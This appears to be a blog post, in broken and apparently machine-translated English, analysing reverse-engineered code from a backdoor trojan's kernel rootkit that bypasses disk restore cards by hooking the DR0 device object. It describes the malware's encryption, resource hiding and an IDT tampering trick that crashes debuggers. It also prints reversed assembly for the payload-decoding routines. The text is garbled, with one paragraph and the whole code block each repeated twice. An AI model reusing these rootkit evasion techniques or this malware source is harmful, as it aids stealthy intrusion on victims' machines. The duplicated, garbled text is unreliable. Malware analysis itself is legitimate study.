Author:combojiang
Today will begin practical rootkit. The article talk object hook.
The article root in Backdoor Tyojan code of reverse, I only post applied part some time ago, I am not post kernel part for don't used in. But if learn, There is use rootkit that is superduper example to learn. So I use it to first learn rootkit. I hope to don't use code to other.
The article root in Backdoor Tyojan code of reverse, I only post applied part some time ago, I am not post kernel part for don't used in. But if learn, There is use rootkit that is superduper example to learn. So I use it to first learn rootkit. I hope to don't use code to other.
To the rootkit, Break restore is a part of function, Wonderful part isn't here, but imformation encryption and hide and anti-debugger oneself. After Reverse analyse, Author is good bitterness work hard, If the code use in the right direction, Will benefit many people......
First hide imformation bright spot: Rootkit as an resource hide on program of user module.
Second hide imformation bright spot: The user program code as an preface of generate secret key, That can effectively prevent after reverse, imformation of hide is flawed, Because only after reverse to generate code is full same original author code, Do this can open deep hide link of downloader and code.
Third hide imformation bright spot: Use a fixed key, Generate array by 1024 secret key component, Then use the secret key array operate with user code, finaly generate 4 bytes decode key.
Use decode key, find to hide dirty bad thing on its resourse form driver of load to memory. and finaly full clear trace.
Four hide imformation bright spot: Modify idt 0e mark break, let it point a invalid address to BSOD when debug, Do this can anti-debug.
These bright spot only is on rootkit, As an part of user code have many bright spot, Because already post the code some time ago, Everyone refer to finde its bright spot. OK, joking apart.
Principle of break through restore card: Use object hook on here.
1. IRP_MJ_CREATE routine is used to get disc disk device object, Call IoGetDeviceObjectPointer function to get "\\Device\\Harddisk0\\DR0" - the name of device object, and detect device whether have other device articulated, If have to save the device and wipe off the articulated.
2. Recover addition of DR0 on IRP_MJ_CLOSE, Do this must come and go without a trace.
Ok, Let us watch reverse code:
.386
.model flat, stdcall
option casemap:none
include pcihdd.inc
.data
aDevicePhysical db '\Device\PhysicalHardDisk0',0
aDosdevicesPhys db '\DosDevices\PhysicalHardDisk0',0
SourceString db '\Device\Harddisk0\DR0',0
g_DeviceObject dd 0
g_AttachedDevice dd 0
DecodeKey dd 1024 dup (0)
DecodeKEY dd 0
P dd 0
NumberOfBytes dd 0
IDTData db 6 dup(0)
Format db '%08X',0
.code
;*******************************************************************************
; Generate a decode secret key array
;*******************************************************************************
CreateDecodeKey proc
jmp short $+2 ;junk instruction
mov ecx, 100h
mov edx, 0CCECC9B1h ;KEY
OutLoop:
lea eax, [ecx-1]
push ecx
mov ecx, 8
InLoop:
shr eax, 1
jnb ContinueLoop
xor eax, edx
ContinueLoop:
dec ecx
jnz InLoop
pop ecx
mov DecodeKey[ecx*4], eax ;Save decode secret key array
dec ecx
jnz OutLoop
retn
CreateDecodeKey endp
;*****************************************************************************
; Use mode import full code operate with above generation decode secret key, finaly generate decode key
; Decode key will be used to decode content of driver resource, After decode Resource feed back to user .(Watch start)
;*****************************************************************************
DecodeInputData proc near
jmp short $+2 ;junk instruction
mov eax, 0FFFFFFFFh
or ebx, ebx ;Judge IRP.AssociatedIrp.SystemBuffer whether is null
jz Quit
@@:
mov dl, [ebx]
xor dl, al
movzx edx, dl
shr eax, 8
xor eax, DecodeKey[edx*4]
inc ebx
dec ecx
jnz @B
Quit:
not eax
retn
DecodeInputData endp
.model flat, stdcall
option casemap:none
include pcihdd.inc
.data
aDevicePhysical db '\Device\PhysicalHardDisk0',0
aDosdevicesPhys db '\DosDevices\PhysicalHardDisk0',0
SourceString db '\Device\Harddisk0\DR0',0
g_DeviceObject dd 0
g_AttachedDevice dd 0
DecodeKey dd 1024 dup (0)
DecodeKEY dd 0
P dd 0
NumberOfBytes dd 0
IDTData db 6 dup(0)
Format db '%08X',0
.code
;*******************************************************************************
; Generate a decode secret key array
;*******************************************************************************
CreateDecodeKey proc
jmp short $+2 ;junk instruction
mov ecx, 100h
mov edx, 0CCECC9B1h ;KEY
OutLoop:
lea eax, [ecx-1]
push ecx
mov ecx, 8
InLoop:
shr eax, 1
jnb ContinueLoop
xor eax, edx
ContinueLoop:
dec ecx
jnz InLoop
pop ecx
mov DecodeKey[ecx*4], eax ;Save decode secret key array
dec ecx
jnz OutLoop
retn
CreateDecodeKey endp
;*****************************************************************************
; Use mode import full code operate with above generation decode secret key, finaly generate decode key
; Decode key will be used to decode content of driver resource, After decode Resource feed back to user .(Watch start)
;*****************************************************************************
DecodeInputData proc near
jmp short $+2 ;junk instruction
mov eax, 0FFFFFFFFh
or ebx, ebx ;Judge IRP.AssociatedIrp.SystemBuffer whether is null
jz Quit
@@:
mov dl, [ebx]
xor dl, al
movzx edx, dl
shr eax, 8
xor eax, DecodeKey[edx*4]
inc ebx
dec ecx
jnz @B
Quit:
not eax
retn
DecodeInputData endp
No comments:
Post a Comment